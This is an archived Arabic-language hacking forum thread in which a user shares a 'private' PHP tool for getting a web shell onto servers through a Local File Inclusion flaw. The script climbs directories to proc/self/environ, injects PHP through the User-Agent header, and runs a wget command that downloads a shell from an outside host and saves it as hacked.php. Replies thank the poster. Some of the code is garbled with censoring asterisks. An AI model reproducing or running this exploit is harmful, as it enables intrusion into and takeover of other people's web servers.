:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Uploading Shell Through Local File Inclusion ( LFI ) priv8 (http://www.vbspiders.com/vb/t16743.html)

D4rK 08-03-2009 06:19 AM

Uploading Shell Through Local File Inclusion ( LFI ) priv8
 
1 مرفق
مرحبا

شباب اداة برايفت واحد اجنبي صاحبي مبرمجها

الشب قرر ينزلها

بس مش حتلاقوها ولا محل غير هون

و الشب اسمو بلاك دريم وهو اجنبي يعني مش علااء المصري يلي منعرفو :a07:

كود PHP:

 <?php

//Get Shell Via LFI(Local File Inclusion)
//Copyright BlackDream 2009 
//mr.pr0n you are the best boy


//edit this if you want. Linux Command
$cmd "<?php system(\"wget http://testsite.li/components/shell.txt; mv shell.txt hacked.php\");?>";
$site "http://www.thesite.com/index.php?page="//enter it like http://www.thesite.com/index.php?page=
$proc_path "proc/self/environ"//without first slash


//Do not edit below this line

preg_match"@^(http://.*?)(/|$)@"$site$matches );

$path "";
$i 0;

while ( 
)
{
    if ( 
$i >= 20 )
        break;

    
$path .= "../";
    
$source page_get_*******( $site $path $proc_path );
    if ( 
strstr($source'********_ROOT') != false )
    {
        exit( 
"\nShell Uploaded With Success -> " $matches[1] . '/' "hacked.php" );
    } else
        echo 
"\nFail at state " $i "\n";
    
$i++;
}

function 
page_get_*******( $url )
{
    global 
$cmd;
    
$ch curl_init$url );
    
curl_setopt$chCURLOPT_RETURNTRANSFERtrue );
    
curl_setopt$chCURLOPT_HEADER);
    
curl_setopt$chCURLOPT_USERAGENT$cmd );
    
curl_setopt$chCURLOPT_CONNECTTIMEOUT);
    
curl_setopt$chCURLOPT_TIMEOUT);
    
$ret curl_exec$ch );
    
curl_close$ch );
    return 
$ret;
}

?>


The Final Doom 08-03-2009 06:45 AM

تسلم يا حج دآرك على الثغرة بس يا ريت تضعها في ملف تكست أحسن

D4rK 08-03-2009 06:47 AM

تم عماد + الي مش فاهم شو هذا

هذا سكربت لثغرات الـ LFI الي بتخليك تقرا ملفات السيرفر .. تصير ترفع شل =]

الكل كان مفكر هل ثغرات ما لها فائدة بس هي هون صارلها فايدة

تحياتي

Tn-Sn!PeR 08-22-2013 05:43 PM

رد: Uploading Shell Through Local File Inclusion ( LFI ) priv8
 
سلمت يداك يا غالي على السكريبت

mimo-dz 12-09-2018 01:50 AM

رد: Uploading Shell Through Local File Inclusion ( LFI ) priv8
 
شكرا لك


الساعة الآن 03:40 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0